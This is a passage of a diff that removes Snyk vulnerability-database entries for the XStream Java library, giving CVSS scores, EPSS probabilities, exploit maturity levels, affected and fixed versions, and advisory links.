-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 6.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:46.704908Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 5.9,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:57.253801Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:P",
-        "disclosed_at": "2021-08-24T08:41:01Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.10946",
-          "probability": "0.00038"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569189",
-        "initially_fixed_in_versions": [
-          "1.4.18"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:53:46.704908Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-08-24T15:09:23.599216Z",
-        "references": [
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-39140.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "https://x-stream.github.io/changes.html%231.4.18"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569190": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.18)"
-        ],
-        "created_at": "2021-08-24T08:45:56.403418Z",
-        "credits": [
-          "m0d9"
-        ],
-        "cvss_base_score": 8.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-06-27T16:07:22.270326Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:48:56.828716Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:48.46823Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 5.9,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:58.026184Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
-        "disclosed_at": "2021-08-24T08:43:57Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.98503",
-          "probability": "0.67834"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Nuclei Templates",
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569190",
-        "initially_fixed_in_versions": [
-          "1.4.18"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-11-12T05:03:39.460752Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-08-24T15:09:23.370464Z",
-        "references": [
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-39152.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "https://x-stream.github.io/changes.html%231.4.18"
-          },
-          {
-            "title": "Nuclei Templates",
-            "url": "https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39152.yaml"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569191": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.18)"
-        ],
-        "created_at": "2021-08-24T08:48:40.47485Z",
-        "credits": [
-          "Lai Han"
-        ],
-        "cvss_base_score": 8.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:58:04.67284Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:44:28.163729Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 8.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:54.94886Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 5.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:57.335324Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
-        "disclosed_at": "2021-08-24T08:47:22Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.82979",
-          "probability": "0.01965"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569191",
-        "initially_fixed_in_versions": [
-          "1.4.18"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:53:54.94886Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2021-08-24T15:09:23.138966Z",
-        "references": [
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-39150.html"
-          },
-          {
-            "title": "XStream Changelog",
-            "url": "https://x-stream.github.io/changes.html%231.4.18"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-2388977": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.19)"
-        ],
-        "created_at": "2022-02-01T12:38:13.80583Z",
-        "credits": [
-          "r00t4dm"
-        ],
-        "cvss_base_score": 7.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:58:26.65944Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:17.715751Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:50.000449Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 5.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:25.989798Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
-        "disclosed_at": "2022-02-01T00:48:15Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.83600",
-          "probability": "0.02139"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-2388977",
-        "initially_fixed_in_versions": [
-          "1.4.19"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:53:50.000449Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2022-02-01T14:57:29.27203Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/x-stream/xstream/commit/e8e88621ba1c85ac3b8620337dd672e0c0c3a846"
-          },
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2021-43859.html"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-30385": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[0.3 ,1.4.9)"
-        ],
-        "created_at": "2017-02-22T07:28:18.55Z",
-        "credits": [
-          "guykoth"
-        ],
-        "cvss_base_score": 7.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T14:01:33.956931Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2025-05-24T01:13:45.713672Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 5.3,
-            "cvss_version": "3.0",
-            "modified_at": "2024-03-11T09:50:00.74058Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
-        "disclosed_at": "2016-03-20T22:26:12Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.85710",
-          "probability": "0.02859"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-30385",
-        "initially_fixed_in_versions": [
-          "1.4.9"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-05-24T01:13:45.713672Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2016-03-20T22:26:12Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/x-stream/xstream/commit/5b5cd6d8137f645c5d57b648afb1a305967aa7f4"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/x-stream/xstream/commit/696ec886a23dae880cf12e34e1fe09c5df8fe946"
-          },
-          {
-            "title": "GitHub Issue",
-            "url": "https://github.com/x-stream/xstream/issues/25"
-          },
-          {
-            "title": "NVD",
-            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3674"
-          },
-          {
-            "title": "OSS security Advisory",
-            "url": "http://www.openwall.com/lists/oss-security/2016/03/28/1"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-3091180": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[0,1.4.20)"
-        ],
-        "created_at": "2022-10-31T13:11:26.972623Z",
-        "credits": [
-          "Václav Haisman"
-        ],
-        "cvss_base_score": 5.3,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 5.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T14:07:26.139623Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:51:40.132066Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:57.223914Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 5.9,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:04.698042Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
-        "disclosed_at": "2022-10-31T13:06:51Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.47618",
-          "probability": "0.00245"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-3091180",
-        "initially_fixed_in_versions": [
-          "1.4.20"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:53:57.223914Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2022-10-31T16:12:20.720386Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/x-stream/xstream/commit/fe215b33fbc68ab1a6aa526e00ca607926bb3737"
-          },
-          {
-            "title": "GitHub Issue",
-            "url": "https://github.com/x-stream/xstream/issues/314"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-31394": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.10)"
-        ],
-        "created_at": "2017-05-17T12:10:22.458Z",
-        "credits": [
-          "Unknown"
-        ],
-        "cvss_base_score": 7.5,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:57:39.786417Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2025-05-24T01:13:46.291382Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 5.9,
-            "cvss_version": "3.0",
-            "modified_at": "2024-03-11T09:48:23.349842Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
-        "disclosed_at": "2017-04-29T19:59:00Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.85902",
-          "probability": "0.02946"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "not defined",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "not defined",
-              "type": "primary"
-            }
-          ],
-          "sources": []
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-31394",
-        "initially_fixed_in_versions": [
-          "1.4.10"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-05-24T01:13:46.291382Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2017-05-21T07:52:36Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/x-stream/xstream/commit/6e546ec366419158b1e393211be6d78ab9604ab"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/x-stream/xstream/commit/8542d02d9ac5d384c85f4b33d6c1888c53bd55d"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/x-stream/xstream/commit/b3570be2f39234e61f99f9a20640756ea71b1b4"
-          },
-          {
-            "title": "NVD",
-            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7957"
-          },
-          {
-            "title": "Vendor Advisory",
-            "url": "http://x-stream.github.io/CVE-2017-7957.html"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-3182897": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.20)"
-        ],
-        "created_at": "2022-12-25T13:47:57.152289Z",
-        "credits": [
-          "Lai Han"
-        ],
-        "cvss_base_score": 5.9,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 5.9,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T14:07:26.652888Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:52:55.493617Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:48.662968Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:53:04.700205Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P",
-        "disclosed_at": "2022-12-25T13:39:32Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.88349",
-          "probability": "0.04274"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-3182897",
-        "initially_fixed_in_versions": [
-          "1.4.20"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-03-11T09:53:48.662968Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2022-12-25T14:12:46.613303Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/x-stream/xstream/commit/e9151f221b4969fb15b1e946d5d61dcdd459a391"
-          },
-          {
-            "title": "XStream Advisory",
-            "url": "http://x-stream.github.io/CVE-2022-41966.html"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-460764": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.7)",
-          "[1.4.10,1.4.11)"
-        ],
-        "created_at": "2019-09-04T13:59:15.268423Z",
-        "credits": [
-          "Dinis Cruz"
-        ],
-        "cvss_base_score": 4.8,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 4.8,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-06T13:57:42.359284Z",
-            "severity": "medium",
-            "type": "primary",
-            "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N/E:F/RL:O/RC:C"
-          },
-          {
-            "assigner": "NVD",
-            "base_score": 9.8,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:49:15.799398Z",
-            "severity": "critical",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 6.3,
-            "cvss_version": "3.1",
-            "modified_at": "2024-03-11T09:48:20.659893Z",
-            "severity": "medium",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"
-          }
-        ],
-        "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N/E:F/RL:O/RC:C",
-        "disclosed_at": "2013-12-22T16:22:18Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.94272",
-          "probability": "0.15054"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "functional",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "ExploitDB",
-            "Nuclei Templates",
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-460764",
-        "initially_fixed_in_versions": [
-          "1.4.7",
-          "1.4.11"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2025-11-12T05:04:42.970985Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2016-12-25T16:51:50Z",
-        "references": [
-          {
-            "title": "Dinis Cruz Blog",
-            "url": "http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html"
-          },
-          {
-            "title": "Exploit DB",
-            "url": "https://www.exploit-db.com/exploits/39193"
-          },
-          {
-            "title": "Fisheye",
-            "url": "https://fisheye.codehaus.org/changelog/xstream?cs=2210"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/x-stream/xstream/commit/6344867dce6767af7d0fe34fb393271a6456672d"
-          },
-          {
-            "title": "Redhat Bugzilla",
-            "url": "https://bugzilla.redhat.com/CVE-2013-7285"
-          },
-          {
-            "title": "RedHat Bugzilla Bug",
-            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1051277"
-          },
-          {
-            "title": "Nuclei Templates",
-            "url": "https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2013/CVE-2013-7285.yaml"
-          }
-        ],
-        "severity": "medium",
-        "source": "snyk_vuln"
-      },
-      "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-8352924": {
-        "affected_hash_ranges": [],
-        "affected_hashes": [],
-        "affected_versions": [
-          "[,1.4.21)"
-        ],
-        "created_at": "2024-11-08T07:53:13.375269Z",
-        "credits": [
-          "Alexis Challande"
-        ],
-        "cvss_base_score": 8.7,
-        "cvss_sources": [
-          {
-            "assigner": "Snyk",
-            "base_score": 8.7,
-            "cvss_version": "4.0",
-            "modified_at": "2024-11-08T07:53:13.677692Z",
-            "severity": "high",
-            "type": "primary",
-            "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"
-          },
-          {
-            "assigner": "Snyk",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-11-08T07:53:13.677692Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P"
-          },
-          {
-            "assigner": "Red Hat",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-11-09T13:32:23.362333Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          },
-          {
-            "assigner": "SUSE",
-            "base_score": 7.5,
-            "cvss_version": "3.1",
-            "modified_at": "2024-11-20T11:01:43.397333Z",
-            "severity": "high",
-            "type": "secondary",
-            "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
-          }
-        ],
-        "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P",
-        "disclosed_at": "2024-11-07T21:51:17Z",
-        "ecosystem": {
-          "language": "java",
-          "package_manager": "maven",
-          "type": "build"
-        },
-        "epss_details": {
-          "model_version": "v2025.03.14",
-          "percentile": "0.39481",
-          "probability": "0.00176"
-        },
-        "exploit_details": {
-          "maturity_levels": [
-            {
-              "format": "CVSSv3",
-              "level": "proof of concept",
-              "type": "secondary"
-            },
-            {
-              "format": "CVSSv4",
-              "level": "proof of concept",
-              "type": "primary"
-            }
-          ],
-          "sources": [
-            "Snyk"
-          ]
-        },
-        "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-8352924",
-        "initially_fixed_in_versions": [
-          "1.4.21"
-        ],
-        "is_fixable": true,
-        "is_malicious": false,
-        "is_social_media_trending": false,
-        "modified_at": "2024-11-20T11:01:43.397333Z",
-        "package_name": "com.thoughtworks.xstream:xstream",
-        "package_version": "",
-        "published_at": "2024-11-08T07:53:13.624529Z",
-        "references": [
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/x-stream/xstream/commit/bb838ce2269cac47433e31c77b2b236466e9f266"
-          },
-          {
-            "title": "GitHub Commit",
-            "url": "https://github.com/x-stream/xstream/commit/fdd9f7d3de0d7ccf2f9979bcd09fbf3e6a0c881a"
-          },
-          {
-            "title": "XStream Advisory",
-            "url": "https://x-stream.github.io/CVE-2024-47072.html"
-          }
-        ],
-        "severity": "high",
-        "source": "snyk_vuln"
-      },
